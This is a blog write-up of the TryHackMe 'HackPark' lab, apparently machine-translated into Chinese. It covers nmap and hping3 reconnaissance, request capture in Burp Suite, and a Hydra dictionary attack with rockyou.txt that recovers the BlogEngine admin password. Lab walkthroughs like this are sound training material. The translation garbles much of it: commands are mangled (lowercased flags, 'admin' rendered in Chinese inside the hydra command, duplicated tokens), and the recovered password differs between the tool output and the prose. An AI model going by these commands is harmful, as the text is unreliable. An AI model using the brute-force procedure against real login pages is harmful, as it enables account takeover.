[tryhackme]我尝试了使用hydra的蛮力攻击! hackpark写入第1部分

[tryhackme]我尝试了使用hydra的蛮力攻击! hackpark写入第1部分

这次,我将在Tryhackme上参加一个名为Hackpark的房间,并尝试使用Hydra进行蛮力攻击。
“ Tryhackme-hackpark: https://tryhackme.com/room/hackpark

请注意,解释是破坏者。

推荐的参考书
作者:ipusiron
¥2,090 (截至2025/07/13的15:33 |亚马逊研究)
Amazon Prime Day现在正在进行中! /
亚马逊
作者:ipusiron
¥3,850 (截至21:11在07/08/2025 |亚马逊研究)
Amazon Prime Day现在正在进行中! /
亚马逊
作者:贾斯汀·塞茨(Justin Seitz),作者:蒂姆·阿诺德(Tim Arnold),监督者:曼塔尼·诺布塔卡(Mantani Nobutaka),翻译:arai yu,翻译:卡卡拉·hirosei(Kakara Hirosei),翻译:村上
¥3,520 (截至12:26在07/09/2025 |亚马逊研究)
Amazon Prime Day现在正在进行中! /
亚马逊
Amazon Prime Day现在正在进行中! /
亚马逊
目录

准备

首先,我们将从准备工作开始。

解决IP地址名称。

首先,确保您的IP地址可以解决。

请在“/etc/hosts”中适当注册IP地址。
这次我将其设置为hack-park.hkl。

$ cat /etc /主机127.0.0.1 localhost 127.0.1.1 hacklab#hacklab#对于IPv6有能力的主机:: 1 Local-Host IP6-Localhost IP6-Localhost IP6-LOOPBACK FF02 :: 1 IP6-ALLNODE

扫描

接下来,让我们尝试portscanning。
说到Portscan,这是NMAP!

如果您不了解NMAP,此信息并尝试学习一会儿。

这是对开关的简要说明。

-pn

不要ping

-t4

进行快速扫描

-一个

版本检测

现在,让我们尝试portscanning hack-park.hkl。

$ nmap -pn -t4 -a hack-park.hkl启动NMAP 7.92(https://nmap.org),2023-02-09 23:39 jst nmap hack-park.hkl(10.10.225.246)主机的jst nmap扫描报告是(0.225.246)主机是(0.27S latency)。未显示:998过滤的TCP端口(无响应)端口状态服务版本80/TCP Open HTTP Microsoft IIS HTTPD 8.5 | http-robots.txt:6不允许条目| /account/*** /search /search.aspx /error404.aspx | _ /archive /archive /archive.aspx | http方法:| _潜在的风险方法:跟踪| _http-title:hackpark | hackpark娱乐| _http-server-Header:Microsoft-iis/8.5 3389/TCP Open SSL/MS-WBT-Server? | RDP-NTLM-INFO:| target_name:hackpark | netbios_domain_name:hackpark | netbios_computer_name:hackpark | dns_domain_name:hackpark | dns_computer_name:hackpark | product_version:6.3.9600 | _ system_time:2023-02-09T14:41:06+00:00 | ssl-cert:主题:commonName = hackpark |在以前没有有效:2023-02-08T14:32:44 | _不有效:2023-08-10T14:32:44 | _SSL-DATE:2023-02-09T14:41:41:10+00:00;扫描仪时间的-1。服务信息:OS:Windows; CPE:CPE:/O:Microsoft:Windows Service检测执行。请在https://nmap.org/submit/上报告任何不正确的结果。 NMAP完成:1个IP地址(1个主机)在119.06秒内进行扫描

扫描是端口,协议和服务时要记住的关键点。
如果您知道系统上正在运行哪种应用程序,则可以创建链接到它们的漏洞。

HackPark不响应PING命令或ICMP数据包。
在这种情况下,您可以使用HPIT来通过发送略微制作的包装来确认响应。

例如,如果您想将SYN数据包发送到端口:80四次,以下是发生的情况。

$ sudo hping3 -s hack -park.hkl -p 80 -c 4 127⨯hping hask -park.hkl(tun0 10.10.225.246):S set,40个标题 + 0数据字节bytes len = 44 ip = 44 ip = 10.10.225.246 len = 44 ip = 10.10.225.246 ttl = 127 df ID = 3646 sport = 80 flags = sa seq = 1 win = 1 win = 8192 rtt = 265.8 ms len = 44 ip = 10.10.225.246 ttl = 127 df = 127 df id = 3647 df id = 3647 sport = 3647 sport = 3647 sport = sa sa seq = 84 ip=10.10.225.246 ttl=127 DF id=3648 sport=80 flags=SA seq=3 win=8192 rtt=272.5 ms --- hack-park.hkl hping statistics --- 4 packets transmitted, 4 packets received, 0% packet loss round-trip min/avg/max = 265.8/272.9/280.2 ms

您会看到它正在使用flags = sa的SYN/ACK数据包响应。

在检查浏览器之前,请尝试使用NC获取服务器指纹和HTTP响应标头。

$ NC hack-park.hkl 80 1⨯头/http/1.0 http/1.1 200 ok cache-control:私有内容长度:9429 content-type-type:text/html; CharSet = UTF-8服务器:Microsoft-iis/8.5 Content-Style-type:text/css content-script-type:text/javascript x-powered-by:asp.net日期:asp.net日期:thu,2023年2月9日,2023 14:51:30 GMT连接:关闭:关闭:关闭:

这是您应该关注的地方:

  • 服务器:Microsoft-IIS/8.5
  • X-Power-by:asp.net

我们已经了解了它在Windows Server 2012和Web应用程序环境上的运行方式。

蛮力攻击

现在,让我们开始发动蛮力攻击。

显示登录屏幕

首先,查找登录屏幕。用Firefox打开“ http://hack-park.hkl”。
我认为小丑被展示了。

你看到这个小丑熟悉吗? ?
是Pennywise哈哈

我会回答这个问题,因为它是关于Tryhackme的。

当我寻找博客时,我会看到页脚在说“ BlogEngine”。
这也是一个重要因素,因此请记下它。另外,我查看了来源,发现该版本为“ 3.3.6.0”。

在搜索它时,有一个按钮可以切换到汉堡菜单中的登录屏幕。

您可以从这里登录。

添加了Foxyproxy

让我们添加Foxyproxy,这是Firefox的扩展,以监视Burtsuite中的请求。“ https://addons.mozilla.org/ja/firefox/addon/foxyproxy-standard/ 中添加

如果看起来像这样,您可以添加它。

配置Fox -ipproxy

“选项> add”将打开以下屏幕。
输入以下内容后,选择保存。

  • 标题或描述:打bur
  • 代理类型:http
  • 代理IP地址或DNS名称:127.0.0.1
  • 端口:8080

我认为已添加了Burp,如下所示。

现在,在掉落框中选择BURP。

开始burpsuite

开始burpsuite以监视请求。
如果您如下搜索它,则应该能够找到它。

您设法启动了吗?

拦截请求

现在,我们将使用Burp拦截该请求。
从“代理”选项卡中,请确保它是“截距”。

如果可能,请在刚找到的登录屏幕上使用适当的用户名和密码登录。
这次,两者都设置为“管理员”。
借助BlogEngine,默认的管理用户是管理员,因此它继续像这样爆发猛击攻击。
我认为,使用WordPress,海报的名称和其他信息将有效。 (我也很小心。)

通过选择“登录”按钮,您可能可以在Burp上查看请求详细信息。

收集使用Hydra的信息

从上一个请求中,我们将提取有关如何使用Hydra的信息。

  • 网站IP地址:http://hack-park.hkl:80
  • url:/account/login.aspx
  • HTTP方法:发布
  • 用户名参数:用户名= [admin]
  • 密码参数:密码= [admin]

剩下的就是在登录失败时发送消息,因此请转发并检查。
选择BURP向前。

我发现我登录时收到的信息是“登录失败”。

  • 登录失败时的消息:登录失败

在这里,将询问您在TryHackme中登录表单的HTTP方法,因此请回答“帖子”。

野蛮的野蛮攻击

我们将使用Hydra攻击蛮力。
即使您说蛮力,也需要花费太长时间。

因此,我们将使用kali中的“ rockyou.txt”预订作为密码列表。 (字典攻击,密码列表攻击)

提供社交网络应用程序的Rockyou受到了损害,而Rockyou.txt是基于此的。
包括32,603,388个帐户使用的14,341,564个唯一密码。

当我检查时,它设置为GZ,所以我将扩展它。

$ locate rockyou.txt/usr/share/wordlists/rockyou.txt.gz $ sudo gunzip/usr/share/wordlists/rockyou.txt.gz

我已经复制了之前检查的全部请求,并将其作为post.data。

sudo vi post.data
__viewState = mkyxgv5%2BC0QIGM1T1E0KBTUPGTT5MTRCLGEQJXX4%2BHGCOCU9VMMRKI352KLS8GBM9EYXTNTNTNTVXU62XKHH M5JCY7VVJSNP6M%%2BPYXX9BHLP327JM1DV%2FKVWVH3X2YG1BVSXX3KVB0QOBR2OR5DEK%2FNDMYJWBKGRD0V%2B3DDSAG36IW P4UPF7K%2FTOT2FH2B0B0B0B0B0ZD8JGKFCX4VB2U%2B9NFOQHYODGUPMBX4MN9P%2B%2BBBCJJMLEKQHO0XNMF9XNMF9XN5XN5SQKKVESCA7ZWJ VVX3XY%2FD5ZBC8RFAQU%2FQL7HGRPQSJVUFYBMTWNPFM3RJ0HRJ0HRJ0HRJ0H5OE%2B6BNCULFWCEEXSKCZ43LVGIIOIOOIOQIOIOQIOIOQINMD3JLIMAWYIK DIN%2F8W3QEAFNTZJVO6EF&__事件验证= DPNMF%2B9ZemibHs7B1HK6DNT%2FTHWJB%2F%2F%2BDA7%2BU9AHP9OAWH CESDP46TVSXIQ6OMGHQQBC3YNR3A9QI895RU6YTP0D%2BLKL6UPJXUSDGCAYWGFBKBBPUMFRG2P5CGERFO9GVKJFKJFKHH%2BIHQNS lBY73AOr7xTZO7%2F%2Bt8EyJOA8XHfjUFnu9FQRVO&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=admin&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in

此时,将用户名和密码参数从管理员更改为以下内容:

  • 用户名=^用户^
  • 密码=^通过^
$ cat Post.data __viewState = mkyxgv5%2BC0QIGM1T1E0KBTUPGTT5MTRCLGEQJXX4%2BHGCOCU9VMMRKI352KLS8GBM9EYXTNTNTNTVXU62XKHH M5JCY7VVJSNP6M%%2BPYXX9BHLP327JM1DV%2FKVWVH3X2YG1BVSXX3KVB0QOBR2OR5DEK%2FNDMYJWBKGRD0V%2B3DDSAG36IW P4UPF7K%2FTOT2FH2B0B0B0B0B0ZD8JGKFCX4VB2U%2B9NFOQHYODGUPMBX4MN9P%2B%2BBBCJJMLEKQHO0XNMF9XNMF9XN5XN5SQKKVESCA7ZWJ VVX3XY%2FD5ZBC8RFAQU%2FQL7HGRPQSJVUFYBMTWNPFM3RJ0HRJ0HRJ0HRJ0H5OE%2B6BNCULFWCEEXSKCZ43LVGIIOIOIOQIOIOQIOIOQINMD3JLIMAWYIKD在%2F8W3QEAFNTZJVO6EF和__事件验证= DPNMF%2B9ZemibHs7B1HK6DNT%2FTHWJB%2F%2F%2BDA7%2BU9AHP9OAWHC ESDP46TVSXIQ6OMGHQQBC3YNR3A9QI895RU6YTP0D%2BLKL6UPJXUSDGCAYWGFBKBBBPUMFRG2P5CGERFOFOFO9GVKJFKJFKHH%2BIHQNSL BY73AOR7XTZO7%2F%2BT8EYJOA8XHFJUFNU9FQRVO&CTL00%%24MainContent%24Loginuser%24Username =^user^user^&ctl00 %24MainContent%24loginuser%24Password =^Pass^&Ctl00%24MainContent%24Loginuser%24loginbutton = log+in

Hydra中使用的选项如下:

-L

用户名(-l可以在列表中执行)

-p

密码列表

根据您收集的信息运行Hydra。

  • 行政
  • Rockyou.txt
  • hack-park.hkl
  • HTTP-POST形式
  • “ [url]:[请求]:f = [登录失败时消息]””
$ hydra -l管理员-p/usr/share/wordlists/rockyou.txt hack-park.hkl http-post-form “/account/login.aspx:__viewstate = mkyxgv5%2BC0QIGM1T1E0KBTUPGTT5MTRCLGEQJXX4%2BHGCOCU9VMMRKIMRKIMRKIMRKIMRKLKLS8GB m9eyxtntvxu62xkhhm5jcy7vvjsnp6m%%2BPYXX9BHLP327JM1DV%2FKVWVH3X2YG1BVSX3KVB0QOBR2OR5DEK%2fndmyjwbkgrd0 V%2B3DDDSAG36IWP4UPF7K%2FTOT2FH2B0B0B0B0B0B0ZD8JGKFCX4VB2U%2B9NFOQHYODGUPMBX4MN9P%2B%2B%2BBBCJJJJMLEKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHO0XNMF9XN5SQ KVESCA7ZWJVVX3XY%2FD5ZBC8RFAQU%2FQL7HGRPQSJVUFYBMTWNPFM3RJ0HRJ0HRJ0HRJ0HRJ0H5OE%2B6BNCULFWCEEXSKCZ43LVGGIIOOIOQIOCIOQIOSQINMD3JLI Mawyikdin%2F8W3QEAFNTZJVO6EF&__事件validation = DPNMF%2B9ZemiBHS7B1HK6DNT%2FTHWJB%2F%2F%2BDA7%2BDA7%2BU9AHP9OA WHESSDP46TVSXIQ6OMGHQQBC3YNR3A9QI895RU6YTP0D%2BLKL6UPJXUSDGCAYDGCAYWGFBBBPUMFRG2P5CGERFO9GVKJFKHH%2BIHQNSLB Y73AOR7XTZO7%2F%2BT8EYJOA8XHFJUFNU9FQRVO&CTL00%24MainContent%24loginuser%24username =^user^user^user^&ctl00%24m aincontent%24loginuser%24password =^Pass^&ctl00%24mainContent%24loginuser%24loginbutton = log+in:f = login失败的”
$ hydra -l管理员-p/usr/share/wordlists/rockyou.txt hack-park.hkl http-post-form “/account/login.aspx:__viewstate = mkyxgv5%2BC0QIGM1T1E0KBTUPGTT5MTRCLGEQJXX4%2BHGCOCU9VMMRKIMRKIMRKIMRKIMRKLKLS8GB m9eyxtntvxu62xkhhm5jcy7vvjsnp6m%%2BPYXX9BHLP327JM1DV%2FKVWVH3X2YG1BVSX3KVB0QOBR2OR5DEK%2fndmyjwbkgrd0 V%2B3DDDSAG36IWP4UPF7K%2FTOT2FH2B0B0B0B0B0B0ZD8JGKFCX4VB2U%2B9NFOQHYODGUPMBX4MN9P%2B%2B%2BBBCJJJJMLEKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHOKQHO0XNMF9XN5SQ KVESCA7ZWJVVX3XY%2FD5ZBC8RFAQU%2FQL7HGRPQSJVUFYBMTWNPFM3RJ0HRJ0HRJ0HRJ0HRJ0H5OE%2B6BNCULFWCEEXSKCZ43LVGGIIOOIOQIOCIOQIOSQINMD3JLI Mawyikdin%2F8W3QEAFNTZJVO6EF&__事件validation = DPNMF%2B9ZemiBHS7B1HK6DNT%2FTHWJB%2F%2F%2BDA7%2BDA7%2BU9AHP9OA WHESSDP46TVSXIQ6OMGHQQBC3YNR3A9QI895RU6YTP0D%2BLKL6UPJXUSDGCAYDGCAYWGFBBBPUMFRG2P5CGERFO9GVKJFKHH%2BIHQNSLB Y73AOR7XTZO7%2F%2BT8EYJOA8XHFJUFNU9FQRVO&CTL00%24MainContent%24loginuser%24username =^user^user^user^&ctl00%24m aincontent%24loginuser%24password =^Pass^&ctl00%24mainContent%24loginuser%24loginbutton = log+in:f = login失败的“ hydra v9.2(c)2021由van Hauser/THC和David Maciejak  - 请不要在军事或特勤局组织或出于非法目的中使用(这是无限的,这些***忽略了法律和道德规范)。 Hydra(https://github.com/vanhauser-thc/thc-hydra)从2023-02-10开始http-post-form://hack-park.hkl:80/account/login.aspx:__viewState = mkyxgv5%2BC0QIGM1T1E0KBTUPGTT5MTRCLGEQJ xx4%2BHGCOCU9VMMRKI352KLS8GBM9EXTNTVXU62XKHHM5JCY7VVJSNP6M%2BPYX9BHLPH327JM1DV%2FKVWH3X2YG1BVSX3KVSX3KVB0QO BR2OR5DEK%2FNDMYJWBKGRD0V%2B3DDDDSAG36IWP4UPF7K%2FTOT2FH2B0B0B0B0B0B0B0B0ZD8JGKFCX4VB2U%2B9NFOQHYODGUPMBX4MN9P%2B%2B%2BBBC jJmLeKQhO0Xnmf9xN5sqKvEscA7ZwJvvX3XY%2FD5ZbC8RfaqU%2FQL7hgRPqsjVuffyBMTWnPfM3RJ0hn5oe%2B6BncUlfwCEEXSkcZ4 3LVGIIOQINMD3JLIMAWYIKDIN%2F8W3QEAFNTZJVO6EF&__ eventValidation = dpnmf%2B9Zemibhs7B1HK6DNT%2fthwjb%2fthwjb%2f%2f%2BDA 7%2BU9AHP9OAWHCESDP46TVSXIQ6OMGHQQBC3YNR3A9QI89QI895RU6YTP0D%2BLKL6UPJXUSDGCAYWGFBKBBBPUMFRG2P5CGERFOFOFOFOFOFOO9GVKKJFKHH%2 bihqnslby73aor7xtzo7%2F%2BT8EYJOA8XHFJUFNU9FQRVO&CTL00%24MainContent%24loginuser%24username =^user^user^user^&ctl00 %24MainContent%24loginuser%24Password =^Pass^&Ctl00%24MainContent%24Loginuser%24loginbutton = log+in:f = login失败[状态] 707.00尝试/分钟,707尝试在00:01H,14343692中进行338:09H,16活动[80] [80] [HTTP-POST-form]主机:hack-park..hkl login login:admin密码:1qaz2wsx of 1 of 1 of 1 of 1 of 1 of 1 effered hyra hydra (https://github.com/vanhauser-thc/thc-hydra)于2023-02-10 00:59:22结束

大约需要5分钟,但我认为我能够找到密码“ 1QAZ2WDC”。
这对应于键盘的左两个行。 。 。

使用您找到的密码登录

现在,尝试使用刚找到的密码登录!

我能够成功登录到管理屏幕。

该版本与我之前在源中看到的版本匹配!

最后,我想通过回答Tryhackme问题来结束这一问题。

概括

这次,我只尝试了对Tryhackme Hackpark的蛮力攻击。
这是我第一次,所以我不知道很多事情,但是找到密码令人兴奋!

参考和站点

Steflan: https://steflan-security.com/tryhackme-hackpark-walkthrough/
sechuice: https://www.secjuice.com/thm-hack-park/

如果愿意,请分享!

谁写了这篇文章

这是我开始研究信息安全的博客。作为一名新员工,如果您能宽阔地看着,我会很高兴。
还有Teech Lab,这是一个学习编程乐趣的机会,因此,如果您对软件开发感兴趣,请务必看看!

目录